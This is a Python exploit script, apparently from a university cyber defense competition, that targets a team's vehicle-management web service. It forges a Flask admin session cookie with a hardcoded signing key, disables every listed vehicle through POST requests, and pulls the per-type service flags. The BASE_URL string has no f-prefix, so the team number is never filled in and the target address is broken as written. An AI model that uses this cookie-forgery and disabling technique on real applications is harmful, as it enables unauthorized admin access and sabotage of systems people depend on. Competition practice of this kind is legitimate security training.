import requests
import argparse
from flask.sessions import SecureCookieSessionInterface
from flask import Flask

# Configuration
SECRET_KEY = "cdc"
TEAM_NUMBER = input("Enter team being targeted: ")
#BASE_URL = "http://localhost:5001"
BASE_URL = "http://admin.team{TEAM_NUMBER}.isucdc.com:80"
HEADERS = { "User-Agent": "python-requests/2.6.7; Francis Bourgeois Fan #73962" }

def forge_flask_cookie(payload):
    app = Flask(__name__)
    app.secret_key = SECRET_KEY
    serializer = SecureCookieSessionInterface().get_signing_serializer(app)
    return serializer.dumps(payload)

def run_exploit(forge_mode=False):
    session = requests.Session()
    session.headers.update(HEADERS)

    if forge_mode:
        print("[*] Forging an admin session cookie for 'cdc'...")
        payload = {"username": "cdc", "is_admin": True}
        cookie = forge_flask_cookie(payload)
        session.cookies.set("session", cookie)

    print("[*] Fetching vehicle list...")
    try:
        response = session.get(f"{BASE_URL}/vehicles")
        if response.status_code != 200:
            print(f"[-] Failed to fetch vehicles: {response.status_code}")
            return
        vehicles = response.json()
    except Exception as e:
        print(f"[-] Error: {e}")
        return

    if not vehicles:
        print("[-] No vehicles found.")
        return

    by_type = {}
    for v in vehicles:
        v_type = v['type']
        if v_type not in by_type:
            by_type[v_type] = []
        by_type[v_type].append(v['id'])

    for target_type, v_ids in by_type.items():
        print(f"\n[*] Targeting vehicle type: '{target_type}'.")
        print(f"[*] Disabling {len(v_ids)} vehicles...")
        for v_id in v_ids:
            update_payload = {"status": False}
            response = session.post(f"{BASE_URL}/vehicles/{v_id}", json=update_payload)
            if response.status_code != 200:
                print(f"[-] Failed to disable vehicle {v_id}: {response.status_code}")
        
        print(f"[*] Attempting flag retrieval for {target_type}...")
        flag_response = session.get(f"{BASE_URL}/vehicles/{target_type}/flag")
        if flag_response.status_code == 200:
            print(f"[+] Service flag for {target_type}: {flag_response.json()}")
        else:
            print(f"[-] Failed to retrieve {target_type} flag: {flag_response.status_code}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Exploit script for vehicle flag retrieval.")
    parser.add_argument("--forge", action="store_true", help="Use session forgery (administrator) for requests.")
    args = parser.parse_args()

    run_exploit(forge_mode=args.forge)
